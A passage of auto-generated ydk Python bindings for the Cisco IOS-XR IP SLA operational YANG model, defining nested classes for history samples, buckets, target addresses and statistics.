super(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples, self).__init__()
# Static node metadata consumed by the ydk Entity base class.
self.yang_name = "samples"
self.yang_parent_name = "bucket"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("sample", ("sample", Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample))])
self._leafs = OrderedDict()
self.sample = YList(self)
self._segment_path = lambda: "samples"
# No settable leafs on this node; writes still funnel through the ydk
# Entity machinery (_perform_setattr).
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples, [], name, value)
class Sample(Entity):
"""
Data sample for particular cycle
.. attribute:: sample_index (key)
Sample Index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: target_address
Target for the operation
**type**\: :py:class:`TargetAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress>`
.. attribute:: start_time
Sample Start Time expressed in msec since00\:00 \:00 UTC, January 1, 1970
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: response_time
Round Trip Time (milliseconds)
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: return_code
Response Return Code
**type**\: :py:class:`IpslaRetCode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaRetCode>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
# Build one keyed 'sample' list entry (key: sample_index): timing/result
# leafs plus the 'target-address' child container.
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample, self).__init__()
# Static node metadata consumed by the ydk Entity base class.
self.yang_name = "sample"
self.yang_parent_name = "samples"
self.is_top_level_class = False
self.has_list_ancestor = True
# List key leaf used in the keyed segment path below.
self.ylist_key_names = ['sample_index']
self._child_container_classes = OrderedDict([("target-address", ("target_address", Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress))])
self._child_list_classes = OrderedDict([])
# Leaf descriptors: python attribute name -> YLeaf(YANG type, YANG leaf name).
self._leafs = OrderedDict([
('sample_index', YLeaf(YType.int32, 'sample-index')),
('start_time', YLeaf(YType.uint64, 'start-time')),
('response_time', YLeaf(YType.uint32, 'response-time')),
('return_code', YLeaf(YType.enumeration, 'return-code')),
])
# Leaf values; None until assigned.
self.sample_index = None
self.start_time = None
self.response_time = None
self.return_code = None
self.target_address = Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress()
self.target_address.parent = self
self._children_name_map["target_address"] = "target-address"
self._children_yang_names.add("target-address")
# Keyed list entry: segment path embeds the current sample_index value.
self._segment_path = lambda: "sample" + "[sample-index='" + str(self.sample_index) + "']"
# Route writes to the listed sample leafs through the ydk Entity machinery.
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample, ['sample_index', 'start_time', 'response_time', 'return_code'], name, value)
class TargetAddress(Entity):
"""
Target for the operation
.. attribute:: ipv4_prefix_target
IPv4 prefix target
**type**\: :py:class:`Ipv4PrefixTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.Ipv4PrefixTarget>`
.. attribute:: tunnel_id_target
Tunnel ID target
**type**\: :py:class:`TunnelIdTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.TunnelIdTarget>`
.. attribute:: ipv4_pseudowire_target
IPv4 pseudowire target
**type**\: :py:class:`Ipv4PseudowireTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.Ipv4PseudowireTarget>`
.. attribute:: target_type
TargetType
**type**\: :py:class:`IpslaTargetTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaTargetTypeEnum>`
.. attribute:: ipv4_address_target
IPv4 address target
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv6_address_target
IPv6 address target
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
# Build the sample's 'target-address' node: a union-style target whose
# populated member depends on target_type; the three structured
# alternatives are instantiated eagerly below.
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress, self).__init__()
# Static node metadata consumed by the ydk Entity base class.
self.yang_name = "target-address"
self.yang_parent_name = "sample"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("ipv4-prefix-target", ("ipv4_prefix_target", Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.Ipv4PrefixTarget)), ("tunnel-id-target", ("tunnel_id_target", Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.TunnelIdTarget)), ("ipv4-pseudowire-target", ("ipv4_pseudowire_target", Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.Ipv4PseudowireTarget))])
self._child_list_classes = OrderedDict([])
# Leaf descriptors: python attribute name -> YLeaf(YANG type, YANG leaf name).
self._leafs = OrderedDict([
('target_type', YLeaf(YType.enumeration, 'target-type')),
('ipv4_address_target', YLeaf(YType.str, 'ipv4-address-target')),
('ipv6_address_target', YLeaf(YType.str, 'ipv6-address-target')),
])
# Leaf values; None until assigned.
self.target_type = None
self.ipv4_address_target = None
self.ipv6_address_target = None
self.ipv4_prefix_target = Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.Ipv4PrefixTarget()
self.ipv4_prefix_target.parent = self
self._children_name_map["ipv4_prefix_target"] = "ipv4-prefix-target"
self._children_yang_names.add("ipv4-prefix-target")
self.tunnel_id_target = Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.TunnelIdTarget()
self.tunnel_id_target.parent = self
self._children_name_map["tunnel_id_target"] = "tunnel-id-target"
self._children_yang_names.add("tunnel-id-target")
self.ipv4_pseudowire_target = Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.Ipv4PseudowireTarget()
self.ipv4_pseudowire_target.parent = self
self._children_name_map["ipv4_pseudowire_target"] = "ipv4-pseudowire-target"
self._children_yang_names.add("ipv4-pseudowire-target")
self._segment_path = lambda: "target-address"
# Route writes to the listed target leafs through the ydk Entity machinery.
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress, ['target_type', 'ipv4_address_target', 'ipv6_address_target'], name, value)
class Ipv4PrefixTarget(Entity):
    """
    IPv4 prefix target
    .. attribute:: address
    IPv4 address
    **type**\: str
    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
    .. attribute:: mask_length
    Mask length
    **type**\: int
    **range:** 0..255
    """

    # YANG module prefix and revision of the model this binding was generated from.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.Ipv4PrefixTarget, self).__init__()
        self.yang_name = "ipv4-prefix-target"
        self.yang_parent_name = "target-address"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Leaf-only container: no nested containers or YANG lists.
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        # Leaf registry: python attribute name -> YLeaf(YANG type, YANG leaf name).
        self._leafs = OrderedDict([
            ('address', YLeaf(YType.str, 'address')),
            ('mask_length', YLeaf(YType.uint8, 'mask-length')),
        ])
        self.address = None
        self.mask_length = None
        # Path segment contributed by this node when building the data path.
        self._segment_path = lambda: "ipv4-prefix-target"

    def __setattr__(self, name, value):
        # Route writes through Entity._perform_setattr with this class's leaf names.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.Ipv4PrefixTarget, ['address', 'mask_length'], name, value)
class TunnelIdTarget(Entity):
    """
    Tunnel ID target
    .. attribute:: tunnel_id
    Tunnel ID
    **type**\: int
    **range:** 0..4294967295
    """

    # YANG module prefix and revision of the model this binding was generated from.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.TunnelIdTarget, self).__init__()
        self.yang_name = "tunnel-id-target"
        self.yang_parent_name = "target-address"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Leaf-only container: no nested containers or YANG lists.
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        # Single uint32 leaf 'tunnel-id'.
        self._leafs = OrderedDict([
            ('tunnel_id', YLeaf(YType.uint32, 'tunnel-id')),
        ])
        self.tunnel_id = None
        self._segment_path = lambda: "tunnel-id-target"

    def __setattr__(self, name, value):
        # Route writes through Entity._perform_setattr with this class's leaf names.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.TunnelIdTarget, ['tunnel_id'], name, value)
class Ipv4PseudowireTarget(Entity):
    """
    IPv4 pseudowire target
    .. attribute:: address
    IPv4 address
    **type**\: str
    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
    .. attribute:: virtual_circuit_id
    Virtual circuit ID
    **type**\: int
    **range:** 0..4294967295
    """

    # YANG module prefix and revision of the model this binding was generated from.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.Ipv4PseudowireTarget, self).__init__()
        self.yang_name = "ipv4-pseudowire-target"
        self.yang_parent_name = "target-address"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Leaf-only container: no nested containers or YANG lists.
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        # Leaf registry: python attribute name -> YLeaf(YANG type, YANG leaf name).
        self._leafs = OrderedDict([
            ('address', YLeaf(YType.str, 'address')),
            ('virtual_circuit_id', YLeaf(YType.uint32, 'virtual-circuit-id')),
        ])
        self.address = None
        self.virtual_circuit_id = None
        self._segment_path = lambda: "ipv4-pseudowire-target"

    def __setattr__(self, name, value):
        # Route writes through Entity._perform_setattr with this class's leaf names.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Path.Lifes.Life.Buckets.Bucket.Samples.Sample.TargetAddress.Ipv4PseudowireTarget, ['address', 'virtual_circuit_id'], name, value)
class Target(Entity):
    """
    Historical data for the destination node
    .. attribute:: lifes
    Tables of lives for an operation
    **type**\: :py:class:`Lifes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Target.Lifes>`
    """

    # YANG module prefix and revision of the model this binding was generated from.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.History.Target, self).__init__()
        self.yang_name = "target"
        self.yang_parent_name = "history"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Child container registry: YANG element name -> (python attr, class).
        self._child_container_classes = OrderedDict([("lifes", ("lifes", Ipsla.OperationData.Operations.Operation.History.Target.Lifes))])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict()
        # Eagerly instantiate the single 'lifes' child container and link it back.
        self.lifes = Ipsla.OperationData.Operations.Operation.History.Target.Lifes()
        self.lifes.parent = self
        self._children_name_map["lifes"] = "lifes"
        self._children_yang_names.add("lifes")
        self._segment_path = lambda: "target"

    class Lifes(Entity):
        """
        Tables of lives for an operation
        .. attribute:: life
        Operational data for a particular life of the operation
        **type**\: list of :py:class:`Life <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life>`
        """

        _prefix = 'man-ipsla-oper'
        _revision = '2015-11-09'

        def __init__(self):
            super(Ipsla.OperationData.Operations.Operation.History.Target.Lifes, self).__init__()
            self.yang_name = "lifes"
            self.yang_parent_name = "target"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_container_classes = OrderedDict([])
            # YANG list registry: element name -> (python attr, element class).
            self._child_list_classes = OrderedDict([("life", ("life", Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life))])
            self._leafs = OrderedDict()
            # YList holds the ordered 'life' entries, parented to this node.
            self.life = YList(self)
            self._segment_path = lambda: "lifes"

        def __setattr__(self, name, value):
            # No leaves here; still funnel writes through the Entity setter.
            self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Target.Lifes, [], name, value)

        class Life(Entity):
            """
            Operational data for a particular life of
            the operation
            .. attribute:: life_index (key)
            Life Index
            **type**\: int
            **range:** \-2147483648..2147483647
            .. attribute:: buckets
            Table of history buckets (samples) for a particular operation
            **type**\: :py:class:`Buckets <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets>`
            """

            _prefix = 'man-ipsla-oper'
            _revision = '2015-11-09'

            def __init__(self):
                super(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life, self).__init__()
                self.yang_name = "life"
                self.yang_parent_name = "lifes"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                # 'life_index' is the YANG list key for this entry.
                self.ylist_key_names = ['life_index']
                self._child_container_classes = OrderedDict([("buckets", ("buckets", Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets))])
                self._child_list_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('life_index', YLeaf(YType.int32, 'life-index')),
                ])
                self.life_index = None
                self.buckets = Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets()
                self.buckets.parent = self
                self._children_name_map["buckets"] = "buckets"
                self._children_yang_names.add("buckets")
                # Keyed list entry: the path segment embeds the key predicate.
                self._segment_path = lambda: "life" + "[life-index='" + str(self.life_index) + "']"

            def __setattr__(self, name, value):
                self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life, ['life_index'], name, value)

            class Buckets(Entity):
                """
                Table of history buckets (samples) for a
                particular operation
                .. attribute:: bucket
                History bucket for an operation
                **type**\: list of :py:class:`Bucket <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket>`
                """

                _prefix = 'man-ipsla-oper'
                _revision = '2015-11-09'

                def __init__(self):
                    super(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets, self).__init__()
                    self.yang_name = "buckets"
                    self.yang_parent_name = "life"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_container_classes = OrderedDict([])
                    self._child_list_classes = OrderedDict([("bucket", ("bucket", Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket))])
                    self._leafs = OrderedDict()
                    self.bucket = YList(self)
                    self._segment_path = lambda: "buckets"

                def __setattr__(self, name, value):
                    self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets, [], name, value)

                class Bucket(Entity):
                    """
                    History bucket for an operation
                    .. attribute:: bucket_index (key)
                    Bucket Index
                    **type**\: int
                    **range:** \-2147483648..2147483647
                    .. attribute:: target_address
                    Target for the operation
                    **type**\: :py:class:`TargetAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress>`
                    .. attribute:: start_time
                    Sample Start Time expressed in msec since00\:00 \:00 UTC, January 1, 1970
                    **type**\: int
                    **range:** 0..18446744073709551615
                    .. attribute:: response_time
                    Round Trip Time (milliseconds)
                    **type**\: int
                    **range:** 0..4294967295
                    **units**\: millisecond
                    .. attribute:: return_code
                    Response Return Code
                    **type**\: :py:class:`IpslaRetCode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaRetCode>`
                    """

                    _prefix = 'man-ipsla-oper'
                    _revision = '2015-11-09'

                    def __init__(self):
                        super(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket, self).__init__()
                        self.yang_name = "bucket"
                        self.yang_parent_name = "buckets"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        # 'bucket_index' is the YANG list key for this entry.
                        self.ylist_key_names = ['bucket_index']
                        self._child_container_classes = OrderedDict([("target-address", ("target_address", Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress))])
                        self._child_list_classes = OrderedDict([])
                        self._leafs = OrderedDict([
                            ('bucket_index', YLeaf(YType.int32, 'bucket-index')),
                            ('start_time', YLeaf(YType.uint64, 'start-time')),
                            ('response_time', YLeaf(YType.uint32, 'response-time')),
                            ('return_code', YLeaf(YType.enumeration, 'return-code')),
                        ])
                        self.bucket_index = None
                        self.start_time = None
                        self.response_time = None
                        self.return_code = None
                        self.target_address = Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress()
                        self.target_address.parent = self
                        self._children_name_map["target_address"] = "target-address"
                        self._children_yang_names.add("target-address")
                        self._segment_path = lambda: "bucket" + "[bucket-index='" + str(self.bucket_index) + "']"

                    def __setattr__(self, name, value):
                        self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket, ['bucket_index', 'start_time', 'response_time', 'return_code'], name, value)

                    class TargetAddress(Entity):
                        """
                        Target for the operation
                        .. attribute:: ipv4_prefix_target
                        IPv4 prefix target
                        **type**\: :py:class:`Ipv4PrefixTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.Ipv4PrefixTarget>`
                        .. attribute:: tunnel_id_target
                        Tunnel ID target
                        **type**\: :py:class:`TunnelIdTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.TunnelIdTarget>`
                        .. attribute:: ipv4_pseudowire_target
                        IPv4 pseudowire target
                        **type**\: :py:class:`Ipv4PseudowireTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.Ipv4PseudowireTarget>`
                        .. attribute:: target_type
                        TargetType
                        **type**\: :py:class:`IpslaTargetTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaTargetTypeEnum>`
                        .. attribute:: ipv4_address_target
                        IPv4 address target
                        **type**\: str
                        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
                        .. attribute:: ipv6_address_target
                        IPv6 address target
                        **type**\: str
                        **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
                        """

                        _prefix = 'man-ipsla-oper'
                        _revision = '2015-11-09'

                        def __init__(self):
                            super(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress, self).__init__()
                            self.yang_name = "target-address"
                            self.yang_parent_name = "bucket"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = []
                            # Three alternative target representations are registered as child containers.
                            self._child_container_classes = OrderedDict([("ipv4-prefix-target", ("ipv4_prefix_target", Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.Ipv4PrefixTarget)), ("tunnel-id-target", ("tunnel_id_target", Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.TunnelIdTarget)), ("ipv4-pseudowire-target", ("ipv4_pseudowire_target", Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.Ipv4PseudowireTarget))])
                            self._child_list_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('target_type', YLeaf(YType.enumeration, 'target-type')),
                                ('ipv4_address_target', YLeaf(YType.str, 'ipv4-address-target')),
                                ('ipv6_address_target', YLeaf(YType.str, 'ipv6-address-target')),
                            ])
                            self.target_type = None
                            self.ipv4_address_target = None
                            self.ipv6_address_target = None
                            self.ipv4_prefix_target = Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.Ipv4PrefixTarget()
                            self.ipv4_prefix_target.parent = self
                            self._children_name_map["ipv4_prefix_target"] = "ipv4-prefix-target"
                            self._children_yang_names.add("ipv4-prefix-target")
                            self.tunnel_id_target = Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.TunnelIdTarget()
                            self.tunnel_id_target.parent = self
                            self._children_name_map["tunnel_id_target"] = "tunnel-id-target"
                            self._children_yang_names.add("tunnel-id-target")
                            self.ipv4_pseudowire_target = Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.Ipv4PseudowireTarget()
                            self.ipv4_pseudowire_target.parent = self
                            self._children_name_map["ipv4_pseudowire_target"] = "ipv4-pseudowire-target"
                            self._children_yang_names.add("ipv4-pseudowire-target")
                            self._segment_path = lambda: "target-address"

                        def __setattr__(self, name, value):
                            self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress, ['target_type', 'ipv4_address_target', 'ipv6_address_target'], name, value)

                        class Ipv4PrefixTarget(Entity):
                            """
                            IPv4 prefix target
                            .. attribute:: address
                            IPv4 address
                            **type**\: str
                            **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
                            .. attribute:: mask_length
                            Mask length
                            **type**\: int
                            **range:** 0..255
                            """

                            _prefix = 'man-ipsla-oper'
                            _revision = '2015-11-09'

                            def __init__(self):
                                super(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.Ipv4PrefixTarget, self).__init__()
                                self.yang_name = "ipv4-prefix-target"
                                self.yang_parent_name = "target-address"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = []
                                self._child_container_classes = OrderedDict([])
                                self._child_list_classes = OrderedDict([])
                                self._leafs = OrderedDict([
                                    ('address', YLeaf(YType.str, 'address')),
                                    ('mask_length', YLeaf(YType.uint8, 'mask-length')),
                                ])
                                self.address = None
                                self.mask_length = None
                                self._segment_path = lambda: "ipv4-prefix-target"

                            def __setattr__(self, name, value):
                                self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.Ipv4PrefixTarget, ['address', 'mask_length'], name, value)

                        class TunnelIdTarget(Entity):
                            """
                            Tunnel ID target
                            .. attribute:: tunnel_id
                            Tunnel ID
                            **type**\: int
                            **range:** 0..4294967295
                            """

                            _prefix = 'man-ipsla-oper'
                            _revision = '2015-11-09'

                            def __init__(self):
                                super(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.TunnelIdTarget, self).__init__()
                                self.yang_name = "tunnel-id-target"
                                self.yang_parent_name = "target-address"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = []
                                self._child_container_classes = OrderedDict([])
                                self._child_list_classes = OrderedDict([])
                                self._leafs = OrderedDict([
                                    ('tunnel_id', YLeaf(YType.uint32, 'tunnel-id')),
                                ])
                                self.tunnel_id = None
                                self._segment_path = lambda: "tunnel-id-target"

                            def __setattr__(self, name, value):
                                self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.TunnelIdTarget, ['tunnel_id'], name, value)

                        class Ipv4PseudowireTarget(Entity):
                            """
                            IPv4 pseudowire target
                            .. attribute:: address
                            IPv4 address
                            **type**\: str
                            **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
                            .. attribute:: virtual_circuit_id
                            Virtual circuit ID
                            **type**\: int
                            **range:** 0..4294967295
                            """

                            _prefix = 'man-ipsla-oper'
                            _revision = '2015-11-09'

                            def __init__(self):
                                super(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.Ipv4PseudowireTarget, self).__init__()
                                self.yang_name = "ipv4-pseudowire-target"
                                self.yang_parent_name = "target-address"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = []
                                self._child_container_classes = OrderedDict([])
                                self._child_list_classes = OrderedDict([])
                                self._leafs = OrderedDict([
                                    ('address', YLeaf(YType.str, 'address')),
                                    ('virtual_circuit_id', YLeaf(YType.uint32, 'virtual-circuit-id')),
                                ])
                                self.address = None
                                self.virtual_circuit_id = None
                                self._segment_path = lambda: "ipv4-pseudowire-target"

                            def __setattr__(self, name, value):
                                self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.Ipv4PseudowireTarget, ['address', 'virtual_circuit_id'], name, value)
class Statistics(Entity):
"""
Statistics collected for an operation
.. attribute:: latest
Statistics collected during the last sampling cycle of the operation
**type**\: :py:class:`Latest <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest>`
.. attribute:: aggregated
Statistics aggregated for data collected over time intervals
**type**\: :py:class:`Aggregated <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    # Registers the two statistics views ('latest' and 'aggregated') as
    # child containers and instantiates them eagerly, parented to this node.
    super(Ipsla.OperationData.Operations.Operation.Statistics, self).__init__()
    self.yang_name = "statistics"
    self.yang_parent_name = "operation"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Child container registry: YANG element name -> (python attr, class).
    self._child_container_classes = OrderedDict([("latest", ("latest", Ipsla.OperationData.Operations.Operation.Statistics.Latest)), ("aggregated", ("aggregated", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated))])
    self._child_list_classes = OrderedDict([])
    self._leafs = OrderedDict()
    self.latest = Ipsla.OperationData.Operations.Operation.Statistics.Latest()
    self.latest.parent = self
    self._children_name_map["latest"] = "latest"
